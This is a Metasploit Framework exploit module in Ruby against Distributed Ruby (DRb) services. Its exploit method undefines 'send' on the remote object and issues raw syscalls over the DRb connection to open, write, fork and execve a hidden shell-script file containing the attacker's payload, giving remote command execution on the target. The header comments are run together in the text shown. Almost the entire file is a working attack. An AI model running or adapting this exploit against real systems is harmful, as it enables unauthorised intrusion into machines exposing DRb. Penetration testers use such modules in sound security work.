### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/projects/Framework/##
require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote
def initialize(info ={})
super(update_info(info,
'Name'=>'Distributed Ruby send syscall vulnerability.',
'Description'=> %q{ This module exploits remote syscalls in DRuby
},
'Author'=>['joernchen <joernchen@phenoelit.de> (Phenoelit)'],
'License'=> MSF_LICENSE,
'Version'=>'',
'References'=>[],
'Privileged'=> false,
'Payload'=>{'DisableNops'=> true,
'Compat'=>{'PayloadType'=>'cmd',
},
'Space'=>32768,
},
'Platform'=>'linux',
'Arch'=> ARCH_ALL,
'Targets'=>[['Automatic', {}]],
'DefaultTarget'=>0))
register_options([
OptString.new('URI', [true, "The druby URI of the target host ", ""]),
], self.class)
end
def exploit
serveruri = datastore['URI']
DRb.start_service
p = DRbObject.new_with_uri(serveruri)
class << p
undef :send
end
filename ="." + Rex::Text.rand_text_alphanumeric(16)# syscall open
i =p.send(:syscall,8,filename,0700)#syscall write
p.send(:syscall,4,i,"#!/bin/sh\n"<< payload.encoded,payload.encoded.length + 10)#syscall close
p.send(:syscall,6,i)#syscall fork
p.send(:syscall,2)#syscall execve
p.send(:syscall,11,filename,0,0)
handler(nil)
end
end
